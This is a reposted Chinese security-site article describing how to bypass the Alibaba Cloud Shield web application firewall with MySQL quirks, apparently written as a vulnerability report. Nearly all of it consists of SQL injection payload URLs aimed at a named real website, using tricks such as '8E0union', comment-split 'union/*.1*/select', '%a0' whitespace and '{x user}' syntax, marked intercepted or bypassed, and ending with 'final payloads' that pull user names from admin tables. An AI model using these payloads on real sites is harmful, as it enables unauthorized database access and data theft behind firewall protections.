欢迎来到 黑吧安全网 聚焦网络安全前沿资讯,精华内容,交流技术心得!

阿里巴巴云盾防御策略可以bypass

来源:本站整理 作者:izy 时间:2015-04-28 TAG: 我要投稿

 现在很多waf都是检查单词边界,但是mysql很多特性导致我们可以绕过这些边界检查。




http://www.alijijinhui.org/index.php?id=1 union -------OK

http://www.alijijinhui.org/index.php?id=1 union select -------拦截



用mysql特性8E0 bypass 详情见 http://zone.wooyun.org/content/16772



http://www.alijijinhui.org/index.php?id=08Eunion select -------bypass

http://www.alijijinhui.org/index.php?id=08Eunion select 1,2,3%23 -------bypass

然后我们随便查一个表admin

/index.php?id=08Eunion select user from %23 -------拦截



当我们查到from时就被拦截了,说明from是关键字,来验证一下

/index.php?id=08Eunion select user fr1om/*./*/admin%23 ------- bypass

说明from被拦截了

现在我们只要绕过from这的拦截就完全bypass啦~

而首先的思路是测试单词边界

http://www.alijijinhui.org/index.php?id=8E0union/*.1*/select user from%a0admin%23 -------- bypass

http://www.alijijinhui.org/index.php?id=1 union/*.1*/select user from%a0admin%23 -------- bypass



另外一种方式

先来了解一下mysql的一个tip:

select{x user}from{x admin} 这样也是可以查询的~



本地测试ok:

select user from users where user_id =8E0union/*.1*/select{x user}from{x users}#

屏幕快照 2015-04-25 下午10.37.03.png





暑假来阿里实习就可以来膜拜各位大牛了!~ :-D

漏洞证明:

最终payload:

http://www.alijijinhui.org/index.php?id=8E0union/*.1*/select{x user}from{x users}%23

http://www.alijijinhui.org/index.php?id=1 union/*.1*/select user from%a0admin%23

 

屏幕快照 2015-04-25 下午10.42.55.png

【声明】:黑吧安全网(http://www.myhack58.com)登载此文出于传递更多信息之目的,并不代表本站赞同其观点和对其真实性负责,仅适于网络安全技术爱好者学习研究使用,学习中请遵循国家相关法律法规。如有问题请联系我们,联系邮箱admin@myhack58.com,我们会在最短的时间内进行处理。
  • 最新更新
    • 相关阅读
      • 本类热门
        • 最近下载